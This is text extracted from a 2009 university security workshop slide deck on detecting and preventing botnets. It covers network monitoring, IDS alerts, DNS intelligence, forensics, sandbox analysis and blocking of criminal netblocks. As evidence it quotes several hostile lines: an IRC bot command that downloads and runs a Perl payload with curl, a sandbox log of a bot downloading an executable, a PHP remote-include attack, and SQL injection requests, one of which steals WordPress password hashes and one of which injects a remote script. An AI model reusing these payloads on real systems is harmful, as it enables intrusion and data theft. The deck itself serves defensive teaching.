bots

Botnet Phd (Piled Higher and Deeper)

A Presentation About

Botnet Detection

For

NWACC 09

Security Workshop by

Craig A Schiller, CISSP-ISSMP,ISSAP

Chief Information Security Officer

Portland State University

Agenda

Introduction

Detection

Forensics/Intel Gathering

Malware Analysis

Incident Response

Prevention

© 2009 Craig A Schiller 2

Primary Source



Agenda

Introduction

Detection


Malware Analysis

Incident Response

Prevention


How Do We Detect Them?

Computer is

Exploited

Becomes a Bot

Other Bot Clients User Browsing Malicious Sites

C & C

New Bot Rallys to let Botherder know it’s joined the team

A/V Detection

Download server

C & C

Retrieve the Anti

A/V module

Secure the New

Bot Client

Listen to the C&C

Server/Peer for commands

C & C

Report Result to the C&C Channel

Retrieve the

Payload module

Execute the commands

On Command,

Erase all evidence and abandon the client

© 2009 Craig A Schiller

Download server

Possible traffic to victim

6


Other Bot Clients

Security & FW logs C & C

Computer is

Exploited

Becomes a Bot

New Bot Rallys to let Botherder know it’s joined the team

User Browsing Malicious Sites

A/V Detection

Download server

Retrieve the Anti

A/V module

Secure the New

Bot Client Known Malware

Distribution sites

C & C Listen to the C&C

Server/Peer for commands

Known C&C sites

C & C

Botlike Traffic

Report Result to the C&C Channel

User Complaint

Retrieve the

Payload module

Talking to Darknet

Download server

Bad Behavior

Abuse@ notices

Execute the commands

Possible traffic to victim

On Command,

Erase all evidence and abandon the client

Anomalous Protocol Detection



Enterprise Reporting

User Help Desk Tickets

Abuse notifications

Quasi-Intelligence Organizations

Monitoring & Analysis

Ourmon

Firewall & Router logs

IDS/IPS – Host and Network

DNS

Server & Workstation Log analysis

Malware analysis

Forensics


Ourmon

Free network security monitoring tool, with

Botnet detection capabilities http://ourmon.cat.pdx.edu/ourmon/index.html


Network Anomaly Detection



Is it scanning?





Is it participating in an IRC channel?

Is there a high controls to data ratio?





Is the IRC server/port listed as a known Command & Control server?

Does the IRC traffic text look botlike?





Did the host lookup or attempt to communicate with a known C&C server?

Did the host attempt to communicate with an IP address in the Darknet?





TCP workweight = syns sent + fins sent + resets returned/total TCP packets ww = Syn+Fin+Reset

Total TCP

 measure of signal/noise (control/data)

 high number means all control (syn scanner)

 basically means: an IP is scanning



Ourmon does a similar calculation with

IRC traffic



 measure of signal/noise (control/data) high number means non-human communication

 basically means: a bot or an application (game)


Recent large ddos attack

fundamental pkts graph looks like this normally:


Ouch, ouch, ouch!

that’s 869k pps – we have physical gE connection to Inet …


“Botlike” IRC text

IRC text: IRCMSG: PRIVMSG: s=192.168.67.170 -> d=10.252.0.41 dport=65253 sflag=1, channel=priv8 clen=5: p=[:v3t0r!~v3t0r@192.168.137.172

PRIVMSG #priv8 :fmj curl -o mdbn.gif http://www.warriorbride.ca/mdbn.gif;perl mdbn.gif;rm -f *.gif*]


“Normal” IRC text

IRC text: IRCMSG: PRIVMSG: s=192.168.67.170 -> d=10.252.0.41 dport=65253 sflag=1, channel=priv8 clen=5: p=[:v3t0r!~v3t0r@192.168.137.172

PRIVMSG #priv8 : OMG, you’re just my BFF Jill! I once had a BFF that was nowhere as good a BFF as you. <and other meaningless babble> ]


Snort signatures

No general purpose intrusion detection.

Limited set of Bot related signatures


Incident Detection examples

1. today, Mcafee, 131.252.242.243, pri=hi, JS/Wonka [**] [1:3111116:1] Mcafee http feed: : http://bluebookcarpices.com/ < http://pices.com/ > (JS/Wonka) [**]

[Classification: access to a potentially vulnerable web application] [Priority: 2]

05/21-08:13:56.950979 131.252.242.243:52733 -> 216.240.128.250:80 TCP

TTL:63 TOS:0x0 ID:38398 IpLen:20 DgmLen:568 DF

***AP*** Seq: 0xD222814A Ack: 0x278524DD Win: 0xFFFF TcpLen: 32 TCP

Options (3) => NOP NOP TS: 345145726 2079777105

2. today, zlob, 131.252.243.80, pri=hi

[**] [1:666666:1] zlob dns request [**]

[Classification: Potentially Bad Traffic] [Priority: 2]

05/21-09:50:22.532193 131.252.243.80:49190 -> 85.255.115.29:53 UDP

TTL:63 TOS:0x0 ID:3755 IpLen:20 DgmLen:73

Len: 45



REN-ISAC

Shadowserver

Nanog

APWG

Mailing lists

• Botnet

• http://www.whitestar.linuxbox.org/mailman/listinfo/botnets

• Phishing

• http://www.whitestar.linuxbox.org/mailman/listinfo/phishing

• Vendor

ISC Storm Center http://www.emergingthreats.net/ http://www.malwaredomainlist.com




Lists of Known C&C servers

Shadow Server Sample

IP Address

81.211.7.122

69.18.206.194

81.211.7.122

69.18.206.194

81.211.7.122

69.18.206.194

81.211.7.122

69.18.206.194

213.234.193.74

85.21.82.55

Port

3267

3267

3267

3267

6667

Channel

#B#t[r2]N#t

#B#tN#t[r3]

#B�t[r2]N�t

#B.tN.t[r3]

#secured

Country

RU

US

RU

US

RU

US

RU

US

RU

RU

Region

MOSCOW |

COMMACK

MOSCOW |

COMMACK

MOSCOW |

COMMACK

MOSCOW |

COMMACK

MOSCOW |

MOSCOW

State

MOSKVA

NEW YORK

MOSKVA

NEW YORK

MOSKVA

NEW YORK

MOSKVA

NEW YORK

MOSKVA

MOSKVA

Domain

GLDN.NET

INVISION.COM

GLDN.NET

INVISION.COM

GLDN.NET

INVISION.COM

GLDN.NET

INVISION.COM

NET.RU -

ASN

3216

12251

3216

12251

3216

12251

3216

12251

39442

8402

AS Name

SOVAM

INVISION

SOVAM

INVISION

SOVAM

INVISION

SOVAM

INVISION

UNICO

CORBINA

AS Description

AS Golden Telecom, Moscow, Russia

Invision.com, Inc.


Invision.com, Inc.


|Invision.com, Inc.


|Invision.com, Inc.

AS JSC UNICO

AS Corbina Telecom http://www.shadowserver.org/wiki/pmwiki.php/Involve/GetReportsOnYourNetwork#toc1 http://www.shadowserver.org/wiki/pmwiki.php/Services/Botnet-CCIP



REN-ISAC

Supported by Indiana University and through relationship with EDUCAUSE and

Internet2, the RENISAC is an integral part of higher education’s strategy to improve network security through information collection, analysis and dissemination, early warning, and response -- specifically designed to support the unique environment and needs of organizations connected to served higher education and research networks; and supports efforts to protect the national cyber infrastructure by participating in the formal U.S. ISAC structure.

The REN-ISAC receives, analyzes and acts on operational, threat, warning and actual attack information derived from network instrumentation and information sharing relationships. Instrumentation data include netflow, router ACL counters, darknet monitoring, and Global Network Operations Center operational monitoring systems. Information sharing relationships are established with other ISACs,

DHS/US-CERT, private network security collaborations, network and security engineers on national R&E network backbones, and the REN-ISAC members.


Spamhaus Drop List

The Spamhaus Don't Route Or Peer List

DROP (Don't Route Or Peer) is an advisory "drop all traffic" list, consisting of stolen 'zombie' netblocks and netblocks controlled entirely by professional spammers. DROP is a tiny sub-set of the SBL designed for use by firewalls and routing equipment.

DROP is currently available as a simple text list, but will also be available shortly as BGP with routes of listed IPs announced via an AS# allowing networks to then null those routes as being IPs that they do not wish to route traffic for.

The DROP list will NEVER include any IP space "owned" by any legitimate network and reassigned - even if reassigned to the "spammers from hell". It will ONLY include IP space totally controlled by spammers or

100% spam hosting operations. These are "direct allocations" from ARIN, RIPE, APNIC, LACNIC, and others to known spammers, and the troubling run of "hijacked zombie" IP blocks that have been snatched away from their original owners (which in most cases are long dead corporations) and are now controlled by spammers or netblock thieves who resell the space to spammers.

When implemented at a network or ISP's 'core routers', DROP will protect all the network's users from spamming, scanning, harvesting and dDoS attacks originating on rogue netblocks.

Spamhaus strongly encourages the use of DROP by tier-1s and backbones. See the DROP FAQ for information on use and implementation.


Spamhaus Drop List excerpt 9/17/09

85.255.112.0/20 SBL36702

194.146.204.0/22 SBL51152

110.44.0.0/20

116.199.128.0/19

117.103.40.0/21

119.27.128.0/19

SBL74731

SBL56563

SBL75246

SBL75245

119.42.144.0/21

120.143.128.0/21

121.46.64.0/18

128.199.0.0/16

SBL70035

SBL67396

SBL72673

SBL62478

132.232.0.0/16

132.240.0.0/16

134.33.0.0/16

138.252.0.0/16

138.43.0.0/16

139.167.0.0/16

143.49.0.0/16

150.230.0.0/16

152.147.0.0/16

167.28.0.0/16

167.97.0.0/16

168.151.0.0/16

SBL9176

SBL68517

SBL7097

SBL9702

SBL69354

SBL64740

SBL7182

SBL78129

SBL8847

SBL75680

SBL12947

SBL73292


UkrTeleGroup

Nevacon

Sonic Colo-HK

Beijing HuaXingGuangWang

InfoVision Data Hosting Service


InfoMove Limited HK


24

Malware Domain List


DNS for Botnet Detection

I checked and I didn’t see anything


DNS for Botnet Detection


DB of all lookups for

Known C&C

Known Malicious SW

Distros http://www.enyo.de/fw/software/dnslogger/ http://www.enyo.de/fw/software/dnslogger/whois.html


knujon

10 Most Offensive Registrars

XIN NET (Second Time at #1) eNom

Network Solutions

Register.com

PLANETONLINE

RegTime

OnlineNIC

SpotDomains (domainsite)

Wild West

HICHINA Web Solutions


Search Engine Spam & Clicks 4 Hire

Use Google to search for Clicks-4-Hire relays and search engine spam site:yoursite.com -pdf -ppt -doc phentermine OR viagra OR cialis OR vioxx OR oxycontin OR levitra OR ambien

OR xanax OR paxil OR "slot-machine" OR "texas-holdem"


Google site search results


An owned webpage


Browser Intelligence gathering


Links to this web page


Man in the Browser Attack - torpig


Agenda

Introduction

Detection


Malware Analysis

Incident Response

Prevention



• Quick Forensics

• Log Analysis

• Process Explorer

• TCPView

• AutoRuns

• Process Monitor

• Rpier – First Responder Tool

• Automated Forensics

• Consistent information gathered regardless of who runs it

• Sleuthing

• How did they get in?

• What does it do?

• What files are used?

• When did what happen?

• Malware Analysis

• More Sleuthing


Log analysis



Forensics/Intel Gathering example

Process PID CPU

System Idle Process 0

Interrupts n/a

DPCs n/a

System 4 smss.exe

csrss.exe

winlogon.exe

0.39

508

620

884 services.exe

svchost.exe

Corporation

944

1180 wmiprvse.exe

3400 svchost.exe

1252

Corporation

Description

93.36

1.56

Company Name

Hardware Interrupts

Deferred Procedure Calls

Windows NT Session Manager Microsoft Corporation

Client Server Runtime Process Microsoft Corporation

Windows NT Logon Application Microsoft Corporation

Services and Controller app Microsoft Corporation

Generic Host Process for Win32 Services Microsoft

WMI Microsoft Corporation

Generic Host Process for Win32 Services Microsoft init inetd svchost.exe

1312

Interix Subsystem Server

2156

2432 iexplorer.exe

3560

Generic Host Process for PSXSS.EXE

Microsoft Corporation

Interix Utility

Interix Utility


Microsoft Corporation explorer.exe

ccApp.exe

VPTray.exe

VPC32.exe

iexplorer.exe

sqlmangr.exe

8564

9208

8636

9524

6712

9904

Windows Explorer Microsoft Corporation

Symantec User Session Symantec Corporation

Symantec AntiVirus Symantec Corporation

Symantec AntiVirus Symantec Corporation

SQL Server Service Manager

896








Strings in the file iexplorer.exe

Strings in memory


Centralized Logging

Server

`

Internet L

Log o g

C o l

NTSyslog l e c i t o n

`


`

Analysis

MySQL

DataBase

`

42

Workstation Log Analysis

Log Parser http://www.microsoft.com/downloads/details.aspx?FamilyID=890cd06b-abf8-4c25-91b2-f8d975cf8c07&displaylang=en


A/V Centralized Reporting

Use (examine) the central reporting feature of your antivirus server.

Blocked by port blocking rule

3/25/2008 12:56:26 PM C:\Program Files\DNA\btdna.exe

Prevent IRC communication

3/25/2008

3/25/2008

6:26:40 PM

8:55:30 PM

C:\Program Files\DNA\btdna.exe




3/25/2008 11:24:38 PM C:\Program Files\DNA\btdna.exe


3/26/2008 3:37:41 AM C:\Program Files\DNA\btdna.exe


3/26/2008

3/26/2008

5:07:33 AM

7:23:09 AM





202.57.184.145:6666

83.252.58.149:6666

85.21.246.228:6666

80.222.68.139:6667

85.21.246.228:6666

85.21.246.228:6666

80.222.68.139:6667

3/26/2008

3/26/2008

7:38:59 AM C:\Program Files\DNA\btdna.exe


7:54:09 AM C:\Program Files\DNA\btdna.exe


85.21.246.228:6666

80.222.68.139:6667


Prevent IRC communication 85.21.246.228:6666


Prevent mass mailing worms from sending mail 41.220.121.130:25



5/9/2008 4:53:34 PM Would be blocked by Access Protection rule (rule is currently not enforced)

PSU\anyman C:\Program Files\Internet Explorer\iexplore.exe

C:\Documents and Settings\anyman\Local Settings\Temporary Internet Files\Content.IE5\BDX492TE\

MediaTubeCodec_ver1.556.0[1].exe

Common Standard Protection:

Prevent common programs from running files from the Temp folder Action blocked : Execute

MediaTubeCodec is a fake codec that installs malware and tells you that your computer is infected so you will download a fake antivirus product.

This appeared in the logs before McAfee could detect this malware



What does quarantine or “No Action Taken” mean?

User defined detection: SPYWARE (Potentially Unwanted Program)

5/12/2008 9:01:50 AM No Action Taken (Delete failed)

SYSTEM McShield.exe

C:\Documents and Settings\anyman\Desktop\ctfmona.exe

5/12/2008 9:02:31 AM User defined detection : No Action Taken

( Clean failed because the detection isn't cleanable )

SYSTEM McShield.exe

C:\Documents and Settings\anyman\Desktop\ctfmona.exe


Detectable Behavior

• Multi-homed DNS

– FQDN maps to 3 or more IP addresses botnet1.example.com pointing to 127.0.0.1

botnet1.example.com pointing to 127.0.0.2





• Dynamic DNS used thru commercial site

– Change IP addresses quickly

• Short DNS TTLs for clients

– Remap DNS often, check at boot

• FastFlux DNS

– Change IP addresses and/or DNS names quickly (for spam < 5 minutes) and often


Hiding the C&C Server or Phishing Website

The above animation demonstrates a persistent phishing cluster detected and analyzed by InternetPerils using server addresses from 20 dumps of the APWG repository, the earliest shown 17 May and the latest 20 September. This phishing cluster continues to persist after the dates depicted, and InternetPerils continues to track it.


Passive DNS http://cert.uni-stuttgart.de/stats/dns-replication.php?query=differbe.hk&submit=Query https://dnsparse.insec.auckland.ac.nz/dns/index.html


Fast Flux DNS example


Internal Intelligence gathering

Rapier

A First Responder Toolkit

Developed by Steve Mancini, Intel http://code.google.com/p/rapier/


Rapier


Malware Hash Registry

Cymru is happy to announce the availability of various service options dedicated to mapping suspected malware hashes to our insight about positively identified malware. Now you can check if a particular piece of code is malware by querying against the extensive Team Cymru Malware Hash Registry.

Using whois

$ whois -h hash.cymru.com e1112134b6dcc8bed54e0e34d8ac272795e73d74

RESPONSE

Unix Time -seconds since midnight 1970-01-01 e1112134b6dcc8bed54e0e34d8ac272795e73d74 1221154281 53

% A/V Package

Detection Rate

Using DNS (dig)

$ dig +short 733a48a9cb49651d72fe824ca91e8d00.malware.hash.cymru.com TXT

RESPONSE

"1221154281 53" http://www.team-cymru.org/Services/MHR/


Alternate C&C Methods


Echo-based means the bot would simply announce its existence to the C&C.

There are several ways of doing this with different volumes of data relayed.

•Connect & forget

•File data

•URL data

Command-Based Botnets

• Web GUI based

•Push rather than pull

• P2P

• IM

• Social Networking (My Space profiles)

• Remote Administration Tools

•Dameware

•CarbonCopy

•Terminal Services

•PC Anywhere

•RDP

• Drop zone – ftp is the leading protocol here

• ftp – phishing C&C regularly reports back (echoes) to an FTP C&C, 54

Incident Response

Required by OUS Information Security policy

PSU Information Security policy requires an Incident Response plan

PSU has several means of discovering incidents


Agenda

Introduction

Detection


Malware Analysis

Incident Response

Prevention


Carsten Willem’s CWSandbox

Ubuntu

VMWare

XP Pro


Malware analysis

<scanner name="

CWSandbox


" signature_file_version=" 6.37.0.90

">

<classification> WORM/Rbot.219136.17

</classification>

<additional_info />

</scanner>

<connections_outgoing>

<connection transportprotocol=" TCP " remoteaddr=“ 192.168.209.5

" remoteport=" 13601 " protocol=" IRC " connectionestablished=" 1 " socket=" 448 ">

< irc_data username =" |00||-X-||4245 " password =" bong " nick =" |00||-X-||4245 ">

< channel name =" #sym " topic_deleted =" :.download http://wooop.mooo.com/buz/120.exe c:\120.exe

1 " />

<privmsg_deleted value=" :|00||-X-

||1049!~ieiib@93B8CCFE.DDC369E0.FCF5B135.IP PRIVMSG #sym

:_CHAR(0x03)_9-_CHAR(0x03)_1::_CHAR(0x03)_0[_CHAR(0x03)_12

120|MoD_CHAR(0x03)_0 ]_CHAR(0x03)_1::_CHAR(0x03)_9-_CHAR(0x03)_

Downloaded 324.0 KB to c:\120.exe @ 6.9 KB/sec.

" />

</irc_data>

</connection>


Analyzing the Malware

CWSandbox Analysis


The Future

Honeypots


Agenda

Introduction

Detection


Malware Analysis

Incident Response

Prevention


Responding to Detection


Agenda

Introduction

Detection


Malware Analysis

Incident Response

Prevention


Blocking Organized Crime supporters

If your ISP doesn't already block them, you can add known criminals to your firewall rules or to your DNS dump tables.

Use the Spamhaus Drop list to block known evil sites

Intercage, Inhoster, and Nevacon:

85.255.112.0/20 #SBL36702

(85.255.112.0 - 85.255.127.255)

69.50.160.0/19

(69.50.160.0 - 69.50.191.255)

194.146.204.0/22 #SBL51152

(194.146.204.0 - 194.146.207.255)

Blog that track the RBN activities http://rbnexploit.blogspot.com/


How do they get into User systems?

Guessing weak passwords/phishing attacks

Exploiting Network vulnerabilities

Using Social Engineering

Using web-based Trojans

Trojan websites – Game cheats

Trojan websites - Pornography

Using Email-based Trojans

Phishing & Pharming

Trojan downloads

Using IM-based Trojans (Social engineering)

Rogue dhcp server serving malicious DNS server

How do they get into Servers? php includes

Attacker

<?php include($vuln); ?>

1. Get /a.php?vuln=http://webhost.com/evil.php

4. The Output from evil.php is sent to Attacker

Target.com

3. Malware PHP file ‘evil.php’ is sent to Target.com

And is executed by the include() function.

2. Target makes request to wehost.com/evil.php

Webhost.com

How do they get into Servers? – SQL Injection

--c295b75d-A--

[03/Jun/2008:02:52:08 --0700] ELS-dIP8ehcAACTQmlkAAAAJ 87.118.124.3

45819 192.168.22.155 80

--c295b75d-B--

GET

/shesheet/wordpress/index.php?cat=999+UNION+SELECT+null,CONCAT(66

6,CHAR(58),user_pass,CHAR(58),666,CHAR(58)),null,null,null+FROM+wp_u sers+where+id=1/* HTTP/1.0

Accept: */*

User-Agent: Mozilla/4.0 (compatible; MSIE 5.5; Windows 98; DigExt)

Host: www.somwhere-in.pdx.edu

Connection: close

--c295b75d-H--

mod-sec

Message: Warning. Pattern match

"(?:\\b(?:(?:s(?:elect\\b(?:.{1,100}?\\b(?:(?:length|count|top)\\b.{1,100}?\\bfrom|fr om\\b.{1,100}?\\bwhere)|.*?\\b(?:d(?:ump\\b.*\\bfrom|ata_type)|(?:to_(?:numbe| cha)|inst)r))|p_(?:(?:addextendedpro|sqlexe)c|(?:oacreat|prepar)e|execute(?:sql

)?|makewebt ..." at ARGS:cat. [id "950001"] [msg "SQL Injection Attack.

Matched signature <union select>"] [severity "CRITICAL"]

Stopwatch: 1212486727810932 339469 (2354 3333 -)

Producer: ModSecurity v2.1.5 (Apache 2.x)

Server: Apache/2.2.8 (OpenPKG/CURRENT)

--c295b75d-Z--

Obfu73ca74ion page=-

1%20un%69%6fn%20sel%65%63t%201%2c2%2c3%2c4%2c0x3c736372697

074207372633d22687474703a2f2f73696d706c652d7464732e696e666f2f5f39

2e6a73223e3c2f7363726970743e%2c6%2F%2A

-1 union select 1,2,3,4,<script src="http://simple-tds.info/_9.js"></script>,6/*

Pictures phpBB photo galleries that permit users to post their own pictures

Attacker

1. Evil user post a executable file with a .gif extension (notapic.gif)

2. Evil user browses to the executable gif

Webhost.com

3. Webhost executes notapic.gif as web page owner

Other means

Profiles of user accounts (Social Networking sites)

Comment sections that don’t require the user to authenticate

BB’s that permit users to create their own accounts without an administrator

User web pages

Departmental web pages

Traditional network vulnerability attacks

Protect Your Enterprise

AVOIDANCE

1.

Establish a perimeter and segregate valuable or dangerous network segments. Make

FW rules accountable and require change control

PREVENT

1.

Ensure that all enterprise and local accounts have strong passwords. Configure

Domain security policy to enforce this and auto-lockout

2.

Eliminate all generic accounts. Where possible make all non-user accounts services.

3.

Eliminate or encapsulate all unencrypted authentication

4.

Establish standards for web app and other development to eliminate avoidable coding vulnerabilities (e.g. use of mod-sec for apache websites)

5.

Staff your anti-spam, anti-virus, abuse, proxy cache, and web filter processing efforts

6.

Block outbound port 25 traffic except from your official mail servers

7.

Block outbound DNS requests except for iterative requests made through the official

DNS servers (prevents spray and pray attacks)



DETECT

1.

Install and operate IDS/IPS systems (snort, etc)

2.

Analyze network traffic for heuristic evidence of botlike behavior

3.

Google your own site - site:mysite.com viagra site:mysite.com c99

4.

Centralize and process logs, including workstation security and firewall logs.

5.

Mine your anti-virus quarantines, abuse notifications, infected systems for intelligence about botnet infections. Feed this information to your event correlation system

6.

Participate or join quasi-intelligence organizations

MITIGATE

1.

Use intelligence data in your DNS server to block access to C&C sites and malware distribution sites.

2.

Use your centralized logs to detect and react to password guessing schemes in nearrealtime.

3.

Report detections to an incident reponse team that will quarantine compromised systems, determine physical location, and direct IT staff to retrieve the system, extract first responder data and intelligence, re-image the system than return it to the system owner along with a report on the successful attack vector.

4.

Include known malware distribution sites in your proxy server block lists

5.

Establish a spearphishing hotline for quick response.



REDUCE THE THREAT

1.

Report new threats. Phishing attacks to Anti-Phishing Working Group. Botnet clients/C&C to isotf.org.

2.

Feed the Bot related DNS attempts to your event correlation system

3.

Add SiteAdvisor or IE7 anti-phishing feature to browsers

REDUCE THE VULNERABILITY

1.

Actively scan your site for vulnerabilities (OS, network, web apps, etc)

NON-REALTIME ANALYSIS, DETECTION, and RECOVERY

1.

Analyze data collected to identify new intelligence markers.

2.

Evaluate new signatures, new tools, etc.

3.

Use non-realtime data to develop strategies for ranking confidence related to available data and intelligence.

4.

Use Forensic techniques and sandbox technology to gather intelligence from known compromised workstations.


RBN


RBN Operations

SPB IX

DELTASYS

DATAPOINT

SILVERNET

CREDOLINK

RBN

OINVEST

INFOBOX

11/21/07 Ref: Bizeul.org -

RBN USA Dead?

It is pleasing to report the last remaining peer routing Atrivo

(AS 27595 Atrivo/ Intercage), ‘Pacific Internet Exchange’ (PIE) see Spamhaus ref below, was withdrawn at 2:35am EST

Sunday Sept 21st 2008.

RBN USA Dead?

What Happened?

Company after company dropped relations with InterCage in the wake of multiple reports documenting its shady dealings,

Suddenly UnitedLayer was the last firm willing to work with it. That essentially gave

Donaldson's people the power to send InterCage dark or, as he chose to do, stick

InterCage in a sandbox.

By Angela Gunn , BetaNews

September 25, 2008, 10:40 PM http://www.betanews.com/article/UnitedLayer_COO_Giving_access

_to_InterCage_is_an_issue_of_ethics/1222396858

McColo

It is pleasing to report the last remaining peer routing Atrivo

(AS 27595 Atrivo/ Intercage), ‘Pacific Internet Exchange’ (PIE) see Spamhaus ref below, was withdrawn at 2:35am EST

Sunday Sept 21st 2008.

Effect of De-peering

50% Drop in Spam

Who’s Next?

In the wake of the demise of Atrivo/Intercage and McColo, attention has focused on other badware nets these entities formerly hosted.

EstDomains,

Esthost,

Hostfresh,

Cernel,

EstDomains was an Estonian network, led by Vladimir Tsastsin, that allegedly once acted as the IP registrar for RBN domains. Malicious Web site hosting nasties like CoolWebSearch and other spyware programs trace back to

EstDomains. Tsastsin has links to organized crime and also heads up Rove

Digital, a site also suspected of hosting malware servers.

Anti-spam group Spamhaus called EstDomain, Esthost, Cernel, and Hostfresh, the "tentacles" of Atrivo/Intercage. Spamhaus cited these networks in August

2008 as backed by "gangs of cybercriminals" whose disappearance from the

Web would be difficult to achieve, but would result in a safer Internet.

Agenda

• Botnet Overview

• Botnet Schemes

• How Do They Get In?

• What Can We Do?

• Concluding Thoughts


Source of all evil

Q&A

Questions?

Craig A Schiller, CISSP-ISSMP, ISSAP craigs@pdx.edu

Portland State University

CISO


bots

Botnet Phd (Piled Higher and Deeper)

Agenda

Primary Source

Agenda

How Do We Detect Them?

How Do We Detect Them?

How Do We Detect Them?

Ourmon

Network Anomaly Detection

Network Anomaly Detection

Network Anomaly Detection

Recent large ddos attack

Ouch, ouch, ouch!

“Botlike” IRC text

“Normal” IRC text

Snort signatures

Incident Detection examples

DNS for Botnet Detection

DNS for Botnet Detection

Search Engine Spam & Clicks 4 Hire

Google site search results

An owned webpage

Browser Intelligence gathering

Links to this web page

Man in the Browser Attack - torpig

Agenda

Forensics/Intel Gathering

Log analysis

Forensics/Intel Gathering example

Forensics/Intel Gathering example

Forensics/Intel Gathering example

Forensics/Intel Gathering example

Centralized Logging

Workstation Log Analysis

Internal Intelligence gathering

Rapier

Malware Hash Registry

Alternate C&C Methods

Incident Response

Agenda

Carsten Willem’s CWSandbox

Malware analysis

Analyzing the Malware

The Future

Agenda

Responding to Detection

Agenda

RBN

RBN Operations

RBN USA Dead?

RBN USA Dead?

What Happened?

McColo

Effect of De-peering

Who’s Next?

Agenda

• Botnet Overview

• Botnet Schemes

• How Do They Get In?

• What Can We Do?

• Concluding Thoughts

Source of all evil

Related documents

Add this document to collection(s)

Add this document to saved

Suggest us how to improve StudyLib